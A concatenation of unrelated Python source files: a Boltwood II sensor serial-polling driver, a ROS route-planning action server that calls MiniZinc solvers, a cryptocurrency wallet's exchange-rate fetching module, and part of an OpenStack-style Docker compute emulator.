"""Start polling the Boltwood II sensor.
Args:
callback: Callback function to be called with new data.
"""
# set callback
self._callback = callback
# start thread
self._closing = threading.Event()
self._thread = threading.Thread(target=self._poll_thread)
self._thread.start()
def stop_polling(self):
"""Stop polling of Boltwood II sensor."""
# close and wait for thread
self._closing.set()
self._thread.join()
def _poll_thread(self):
"""Thread to poll and respond to the serial output of the Boltwood II sensor head.
The operation of the Boltwood is somewhat unusual: the sensor head often announces
when it is ready to be polled rather than simply waiting for a poll request. The
thread extracts complete messages from the raw serial stream, parses them, and
hands each resulting report to the registered callback.
"""
# init
serial_errors = 0
sleep_time = self._thread_sleep
last_report = None
raw_data = b''
# loop until closing
while not self._closing.is_set():
# get serial connection
if self._conn is None:
logging.info('connecting to Boltwood II sensor')
try:
# connect
self._connect_serial()
# reset sleep time
serial_errors = 0
sleep_time = self._thread_sleep
except serial.SerialException as e:
# if no connection, log less often
serial_errors += 1
if serial_errors % 10 == 0:
if sleep_time < self._max_thread_sleep:
sleep_time *= 2
else:
sleep_time = self._thread_sleep
# do logging
logging.critical('%d failed connections to Boltwood II: %s, sleep %d',
serial_errors, str(e), sleep_time)
self._closing.wait(sleep_time)
# actually read next line and process it
if self._conn is not None:
# read data
raw_data += self._conn.read()
# extract messages
msgs, raw_data = self._extract_messages(raw_data)
# analyse it
for msg in msgs:
self._analyse_message(msg)
last_report = time.time()
# no report in a long time?
if last_report is not None:
# TODO: This doesn't seem to be a perfect solution, since we now always get a wait time
# after MT/MK/MW/MC packages
if time.time() - last_report > 10:
self._send_poll_request()
# close connection
self._conn.close()
def _extract_messages(self, raw_data: bytes) -> Tuple[List[bytes], bytes]:
""" Extract all complete messages from the raw data from the Boltwood.
Args:
raw_data: bytearray from Boltwood (via serial.readline())
Returns:
List of messages and remaining raw data.
Normally, there should just be a single message per readline, but....
"""
# nothing?
if not raw_data:
return [], b''
# find complete messages
msgs = []
while api.FRAME_END in raw_data:
# get message
pos = raw_data.index(api.FRAME_END)
msg = raw_data[:pos + 1]
# sometimes the response starts with '\x00'; cut that away
if msg.startswith(b'\x00'):
msg = msg[1:]
# store it
msgs.append(msg)
# remove from raw_data
raw_data = raw_data[pos + 1:]
# return new raw_data and messages
return msgs, raw_data
def _connect_serial(self):
"""Open/reset serial connection to sensor."""
# close first?
if self._conn is not None and self._conn.is_open:
self._conn.close()
# create serial object
self._conn = serial.Serial(self._port, self._baudrate,
bytesize=self._bytesize, parity=self._parity,
stopbits=self._stopbits, timeout=self._serial_timeout,
rtscts=self._rtscts)
# open it
if not self._conn.is_open:
self._conn.open()
# ask for data
self._send_poll_request()
def _analyse_message(self, raw_data):
"""Analyse raw message.
Args:
raw_data: Raw data.
Returns:
"""
# no data?
if len(raw_data) == 0 or raw_data == b'\n':
# resend poll request
self._send_poll_request()
return
# get frame
# need to compare slices, because indexing into a bytes object gives an integer, not a byte!
if raw_data[:1] != api.FRAME_START or raw_data[-1:] != api.FRAME_END:
logging.warning('Invalid frame found.')
return
frame = raw_data[1:-1]
# get command
try:
command = api.CommandChar(frame[:1])
except ValueError:
logging.error('Invalid command character found: %s', frame[:1])
return
# what do we do with this?
if command == api.CommandChar.POLL:
# acknowledge it
self._send_ack()
elif command == api.CommandChar.ACK:
# do nothing
pass
elif command == api.CommandChar.NACK:
# do nothing
pass
elif command == api.CommandChar.MSG:
# parse report
try:
report = Report.parse_report(raw_data)
except ValueError as e:
logging.error(str(e))
return
# send it?
if self._callback is not None:
self._callback(report)
def _send_ack(self):
"""Send ACK."""
# send ACK + new poll request
self._conn.write(api.FRAME_START + api.CommandChar.ACK.value + api.FRAME_END + api.REQUEST_POLL)
def _send_poll_request(self):
"""Ask sensor for data."""
self._conn.write(api.REQUEST_POLL)
__all__ = ['BoltwoodII', 'Report']
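# A minimal usage sketch, not part of the driver itself: it assumes the module
# is imported as part of its package, that a Boltwood II head sits on
# /dev/ttyUSB0, and that 30 seconds of polling is enough to see a few reports.
# Port path, log level, and run time are all illustrative.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    station = BoltwoodII(port='/dev/ttyUSB0')
    station.start_polling(lambda report: logging.info('got report: %s', report))
    time.sleep(30)
    station.stop_polling()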
|
route_planning_program_executor.py
|
#! /usr/bin/env python
from threading import Thread
from time import time
import subprocess
import rospy
import actionlib
import offload.msg
import socket
class RoutePlanningProgramExecutor(object):
# create messages that are used to publish feedback/result
# _feedback = offload.msg.FibonacciFeedback()
# _result = offload.msg.FibonacciResult()
def __init__(self, name):
self._action_name = name
self._as = actionlib.ActionServer(self._action_name, offload.msg.RoutePlanAction, goal_cb=self.goal_cb, auto_start = False)
self._as.start()
def goal_cb(self, goalHandle):
goalHandle.set_accepted()
rospy.loginfo("Accepted new goal")
def updateStatus(orderNumber):
feedback = offload.msg.RoutePlanActionFeedback()
#rospy.loginfo("Attributes: %s", vars(feedback))
# feedback.currentOrder = orderNumber
# goalHandle.publish_feedback(feedback)
def completed(finalResult):
status = goalHandle.get_goal_status().status
#updateStatus(sequence)
result = offload.msg.RoutePlanResult()
result.result = finalResult
if status == actionlib.GoalStatus.ACTIVE:
goalHandle.set_succeeded(result)
elif status == actionlib.GoalStatus.PREEMPTED:
goalHandle.set_preempted(result)
else:
goalHandle.set_canceled(result)
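# The planner shells out to the MiniZinc toolchain: mzn2fzn flattens the
# route-finder model with the goal coordinates baked in, then fzn-gecode
# solves the resulting FlatZinc file (named after the start timestamp).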
def findShortestRoute(goalHandle, statusCB, doneCB):
start = time()
goal = goalHandle.get_goal()
rospy.loginfo('%s: Calculating shortest path from (%i,%i) to (%i,%i)' % (self._action_name, goal.cX, goal.cY, goal.tX, goal.tY))
subprocess.call("mzn2fzn /home/ubuntu/route-finder-cp/route-finder.mzn /home/ubuntu/route-finder-cp/data.dzn -D\"steps=%d;cX=%d;cY=%d;tX=%d;tY=%d\" -o %f.fzn"%(goal.steps, goal.cX, goal.cY, goal.tX, goal.tY, start), shell=True)
result = subprocess.check_output("fzn-gecode -p 1 %f.fzn"%(start),shell=True)
end = time()
rospy.loginfo('%s: Calculated shortest path from (%i,%i) to (%i,%i) in %d seconds' % (self._action_name, goal.cX, goal.cY, goal.tX, goal.tY, end-start))
doneCB(result)
Thread(target=findShortestRoute, args=(goalHandle, updateStatus, completed)).start()
if __name__ == '__main__':
#rospy.init_node('fibonacci')
rospy.init_node('route_planner_' + socket.gethostname())
server = RoutePlanningProgramExecutor(rospy.get_name())
rospy.spin()
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import traceback
import csv
from decimal import Decimal
from bitcoin import COIN
from i18n import _
from util import PrintError, ThreadJob
from util import format_satoshis
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
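# Base class for all exchange backends. Subclasses implement get_rates() and,
# where historical data exists, history_ccys()/historical_rates(); quote and
# history fetches run on daemon threads and report back via the callbacks.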
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron Cash'})
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron Cash'})
reader = csv.DictReader(response.content.split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
t.setDaemon(True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.iteritems() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def historical_rates(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def historical_rates(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCe(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('btc-e.nz', '/api/3/ticker/btc_eur')
json_rub = self.get_json('btc-e.nz', '/api/3/ticker/btc_rur')
json_usd = self.get_json('btc-e.nz', '/api/3/ticker/btc_usd')
return {'EUR': Decimal(json_eur['btc_eur']['last']),
'RUB': Decimal(json_rub['btc_rur']['last']),
'USD': Decimal(json_usd['btc_usd']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('btc_to_')])
class CoinDesk(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
ccys = [d['currency'] for d in dicts]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['bpi'][ccy]['rate_float'])
return result
def history_starts(self):
return { 'USD': '2012-11-30' }
def history_ccys(self):
return self.history_starts().keys()
def historical_rates(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice']) / 100}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
pairs = ['BCH%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class CoinFloor(ExchangeBase):
# CoinFloor API only supports GBP on public API
def get_rates(self, ccy):
json = self.get_json('webapi.coinfloor.co.uk:8090/bist/BCH/GBP', '/ticker/')
return {'GBP': Decimal(json['last'])}
class CEXIO(ExchangeBase):
# Cex.io supports GBP, USD, EUR, BTC
def get_rates(self, ccy):
json = self.get_json('cex.io', '/api/ticker/BCH/%s' % ccy)
return { ccy : Decimal(json['last'])}
class BtcMarkets(ExchangeBase):
# BtcMarkets - Australian Exchange - AUD
def get_rates(self, ccy):
json = self.get_json('api.btcmarkets.net', '/market/BCH/%s/tick' % ccy)
return { ccy : Decimal(json['lastPrice'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}
def history_ccys(self):
return ['BRL']
class Unocoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.unocoin.com', 'trade?buy')
return {'INR': Decimal(json)}
class Winkdex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('winkdex.com', '/api/v0/price')
return {'USD': Decimal(json['price']) / 100}
def history_ccys(self):
return ['USD']
def historical_rates(self, ccy):
json = self.get_json('winkdex.com',
"/api/v0/series?start_time=1342915200")
history = json['series'][0]['results']
return dict([(h['timestamp'][:10], h['price'] / 100.0)
for h in history])
def dictinvert(d):
inv = {}
for k, vlist in d.iteritems():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
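# Build the {exchange: [currencies]} map. The result is cached in
# currencies.json next to this module; if the cache is missing, every exchange
# class discovered via introspection is queried once and the file is rewritten.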
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
return json.loads(open(path, 'r').read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
except:
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.set_exchange(self.config_exchange())
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
return fmt_str.format(round(amount, prec))
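    # Worked example for ccy_amount_str (values hypothetical): if the
    # precision lookup yields prec = 2, fmt_str becomes "{:,.2f}" when
    # commas is True, so ccy_amount_str(1234.5, True) == '1,234.50'.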
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
            if self.timeout == 0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'Kraken')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Kraken)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def value_str(self, satoshis, rate):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
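# A worked example of the conversion in value_str above, with hypothetical
# numbers and assuming COIN == 100000000 (satoshis per coin): a balance of
# 50000000 satoshis at a rate of '300.00' gives
#   Decimal(50000000) / COIN * Decimal('300.00') == Decimal('150')
# which ccy_amount_str then renders as '150.00' at the default precision of 2.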
|
compute.py
|
from mininet.link import Link
from resources import *
from docker import DockerClient
import logging
import threading
import uuid
import time
import ip_handler as IP
class HeatApiStackInvalidException(Exception):
"""
Exception thrown when a submitted stack is invalid.
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class OpenstackCompute(object):
"""
This class is a datacenter specific compute object that tracks all containers that are running in a datacenter,
as well as networks and configured ports.
    It has some stack-dependent logic and can check if a received stack is valid.
It also handles start and stop of containers.
"""
def __init__(self):
self.dc = None
self.stacks = dict()
self.computeUnits = dict()
self.routers = dict()
self.flavors = dict()
self._images = dict()
self.nets = dict()
self.ports = dict()
self.compute_nets = dict()
self.dcli = DockerClient(base_url='unix://var/run/docker.sock')
@property
def images(self):
"""
Updates the known images. Asks the docker daemon for a list of all known images and returns
the new dictionary.
:return: Returns the new image dictionary.
:rtype: ``dict``
"""
for image in self.dcli.images.list():
if len(image.tags) > 0:
for t in image.tags:
t = t.replace(":latest", "") # only use short tag names for OSM compatibility
if t not in self._images:
self._images[t] = Image(t)
return self._images
def add_stack(self, stack):
"""
Adds a new stack to the compute node.
:param stack: Stack dictionary.
:type stack: :class:`heat.resources.stack`
"""
if not self.check_stack(stack):
self.clean_broken_stack(stack)
raise HeatApiStackInvalidException("Stack did not pass validity checks")
self.stacks[stack.id] = stack
def clean_broken_stack(self, stack):
for port in stack.ports.values():
if port.id in self.ports:
del self.ports[port.id]
for server in stack.servers.values():
if server.id in self.computeUnits:
del self.computeUnits[server.id]
for net in stack.nets.values():
if net.id in self.nets:
del self.nets[net.id]
def check_stack(self, stack):
"""
Checks all dependencies of all servers, ports and routers and their most important parameters.
:param stack: A reference of the stack that should be checked.
:type stack: :class:`heat.resources.stack`
:return: * *True*: If the stack is completely fine.
* *False*: Else
:rtype: ``bool``
"""
everything_ok = True
for server in stack.servers.values():
for port_name in server.port_names:
if port_name not in stack.ports:
logging.warning("Server %s of stack %s has a port named %s that is not known." %
(server.name, stack.stack_name, port_name))
everything_ok = False
if server.image is None:
logging.warning("Server %s holds no image." % (server.name))
everything_ok = False
if server.command is None:
logging.warning("Server %s holds no command." % (server.name))
everything_ok = False
for port in stack.ports.values():
if port.net_name not in stack.nets:
logging.warning("Port %s of stack %s has a network named %s that is not known." %
(port.name, stack.stack_name, port.net_name))
everything_ok = False
if port.intf_name is None:
logging.warning("Port %s has no interface name." % (port.name))
everything_ok = False
if port.ip_address is None:
logging.warning("Port %s has no IP address." % (port.name))
everything_ok = False
for router in stack.routers.values():
for subnet_name in router.subnet_names:
found = False
for net in stack.nets.values():
if net.subnet_name == subnet_name:
found = True
break
if not found:
logging.warning("Router %s of stack %s has a network named %s that is not known." %
(router.name, stack.stack_name, subnet_name))
everything_ok = False
return everything_ok
def add_flavor(self, name, cpu, memory, memory_unit, storage, storage_unit):
"""
Adds a flavor to the stack.
:param name: Specifies the name of the flavor.
:type name: ``str``
:param cpu:
:type cpu: ``str``
:param memory:
:type memory: ``str``
:param memory_unit:
:type memory_unit: ``str``
:param storage:
:type storage: ``str``
:param storage_unit:
:type storage_unit: ``str``
"""
flavor = InstanceFlavor(name, cpu, memory, memory_unit, storage, storage_unit)
self.flavors[flavor.name] = flavor
return flavor
def deploy_stack(self, stackid):
"""
Deploys the stack and starts the emulation.
        :param stackid: A UUID str of the stack
:type stackid: ``str``
:return: * *False*: If the Datacenter is None
* *True*: Else
:rtype: ``bool``
"""
if self.dc is None:
return False
stack = self.stacks[stackid]
self.update_compute_dicts(stack)
# Create the networks first
for server in stack.servers.values():
self._start_compute(server)
return True
def delete_stack(self, stack_id):
"""
Delete a stack and all its components.
        :param stack_id: A UUID str of the stack
:type stack_id: ``str``
:return: * *False*: If the Datacenter is None
* *True*: Else
:rtype: ``bool``
"""
if self.dc is None:
return False
# Stop all servers and their links of this stack
for server in self.stacks[stack_id].servers.values():
self.stop_compute(server)
self.delete_server(server)
for net in self.stacks[stack_id].nets.values():
self.delete_network(net.id)
for port in self.stacks[stack_id].ports.values():
self.delete_port(port.id)
del self.stacks[stack_id]
return True
def update_stack(self, old_stack_id, new_stack):
"""
        Determines the differences between the old and the new stack and deletes, creates or changes only the parts that
differ between the two stacks.
:param old_stack_id: The ID of the old stack.
:type old_stack_id: ``str``
:param new_stack: A reference of the new stack.
:type new_stack: :class:`heat.resources.stack`
:return: * *True*: if the old stack could be updated to the new stack without any error.
* *False*: else
:rtype: ``bool``
"""
if old_stack_id not in self.stacks:
return False
old_stack = self.stacks[old_stack_id]
# Update Stack IDs
for server in old_stack.servers.values():
if server.name in new_stack.servers:
new_stack.servers[server.name].id = server.id
for net in old_stack.nets.values():
if net.name in new_stack.nets:
new_stack.nets[net.name].id = net.id
for subnet in new_stack.nets.values():
if subnet.subnet_name == net.subnet_name:
subnet.subnet_id = net.subnet_id
break
for port in old_stack.ports.values():
if port.name in new_stack.ports:
new_stack.ports[port.name].id = port.id
for router in old_stack.routers.values():
if router.name in new_stack.routers:
new_stack.routers[router.name].id = router.id
# Update the compute dicts to now contain the new_stack components
self.update_compute_dicts(new_stack)
self.update_ip_addresses(old_stack, new_stack)
# Update all interface names - after each port has the correct UUID!!
for port in new_stack.ports.values():
port.create_intf_name()
if not self.check_stack(new_stack):
return False
# Remove unnecessary networks
for net in old_stack.nets.values():
            if net.name not in new_stack.nets:
self.delete_network(net.id)
# Remove all unnecessary servers
for server in old_stack.servers.values():
if server.name in new_stack.servers:
if not server.compare_attributes(new_stack.servers[server.name]):
self.stop_compute(server)
else:
# Delete unused and changed links
for port_name in server.port_names:
if port_name in old_stack.ports and port_name in new_stack.ports:
if not old_stack.ports.get(port_name) == new_stack.ports.get(port_name):
my_links = self.dc.net.links
for link in my_links:
if str(link.intf1) == old_stack.ports[port_name].intf_name and \
str(link.intf1.ip) == \
old_stack.ports[port_name].ip_address.split('/')[0]:
self._remove_link(server.name, link)
# Add changed link
self._add_link(server.name,
new_stack.ports[port_name].ip_address,
new_stack.ports[port_name].intf_name,
new_stack.ports[port_name].net_name)
break
else:
my_links = self.dc.net.links
for link in my_links:
if str(link.intf1) == old_stack.ports[port_name].intf_name and \
str(link.intf1.ip) == old_stack.ports[port_name].ip_address.split('/')[0]:
self._remove_link(server.name, link)
break
# Create new links
for port_name in new_stack.servers[server.name].port_names:
if port_name not in server.port_names:
self._add_link(server.name,
new_stack.ports[port_name].ip_address,
new_stack.ports[port_name].intf_name,
new_stack.ports[port_name].net_name)
else:
self.stop_compute(server)
# Start all new servers
for server in new_stack.servers.values():
if server.name not in self.dc.containers:
self._start_compute(server)
else:
server.emulator_compute = self.dc.containers.get(server.name)
del self.stacks[old_stack_id]
self.stacks[new_stack.id] = new_stack
return True
def update_ip_addresses(self, old_stack, new_stack):
"""
Updates the subnet and the port IP addresses - which should always be in this order!
:param old_stack: The currently running stack
:type old_stack: :class:`heat.resources.stack`
:param new_stack: The new created stack
:type new_stack: :class:`heat.resources.stack`
"""
self.update_subnet_cidr(old_stack, new_stack)
self.update_port_addresses(old_stack, new_stack)
def update_port_addresses(self, old_stack, new_stack):
"""
        Updates the port IP addresses. First resets all issued addresses, then takes all IP addresses from the old
        stack and assigns them to the matching ports in the new stack. Finally, all new or changed ports get new
        IP addresses.
:param old_stack: The currently running stack
:type old_stack: :class:`heat.resources.stack`
:param new_stack: The new created stack
:type new_stack: :class:`heat.resources.stack`
"""
for net in new_stack.nets.values():
net.reset_issued_ip_addresses()
for old_port in old_stack.ports.values():
for port in new_stack.ports.values():
if port.compare_attributes(old_port):
for net in new_stack.nets.values():
if net.name == port.net_name:
if net.assign_ip_address(old_port.ip_address, port.name):
port.ip_address = old_port.ip_address
port.mac_address = old_port.mac_address
else:
port.ip_address = net.get_new_ip_address(port.name)
for port in new_stack.ports.values():
for net in new_stack.nets.values():
if port.net_name == net.name and not net.is_my_ip(port.ip_address, port.name):
port.ip_address = net.get_new_ip_address(port.name)
def update_subnet_cidr(self, old_stack, new_stack):
"""
        Updates the subnet IP addresses. If the new stack contains subnets from the old stack, it will reuse those
        IP addresses. Otherwise it will create new IP addresses for the subnet.
:param old_stack: The currently running stack
:type old_stack: :class:`heat.resources.stack`
:param new_stack: The new created stack
:type new_stack: :class:`heat.resources.stack`
"""
for old_subnet in old_stack.nets.values():
IP.free_cidr(old_subnet.get_cidr(), old_subnet.subnet_id)
for subnet in new_stack.nets.values():
subnet.clear_cidr()
for old_subnet in old_stack.nets.values():
if subnet.subnet_name == old_subnet.subnet_name:
if IP.assign_cidr(old_subnet.get_cidr(), subnet.subnet_id):
subnet.set_cidr(old_subnet.get_cidr())
for subnet in new_stack.nets.values():
if IP.is_cidr_issued(subnet.get_cidr()):
continue
            cidr = IP.get_new_cidr(subnet.subnet_id)
            subnet.set_cidr(cidr)
return
def update_compute_dicts(self, stack):
"""
        Updates and adds all stack components to the compute dictionaries.
:param stack: A stack reference, to get all required components.
:type stack: :class:`heat.resources.stack`
"""
for server in stack.servers.values():
self.computeUnits[server.id] = server
if isinstance(server.flavor, dict):
self.add_flavor(server.flavor['flavorName'],
server.flavor['vcpu'],
server.flavor['ram'], 'MB',
server.flavor['storage'], 'GB')
server.flavor = server.flavor['flavorName']
for router in stack.routers.values():
self.routers[router.id] = router
for net in stack.nets.values():
self.nets[net.id] = net
for port in stack.ports.values():
self.ports[port.id] = port
def _start_compute(self, server):
"""
Starts a new compute object (docker container) inside the emulator.
Should only be called by stack modifications and not directly.
:param server: Specifies the compute resource.
:type server: :class:`heat.resources.server`
"""
logging.debug("Starting new compute resources %s" % server.name)
network = list()
for port_name in server.port_names:
network_dict = dict()
port = self.find_port_by_name_or_id(port_name)
if port is not None:
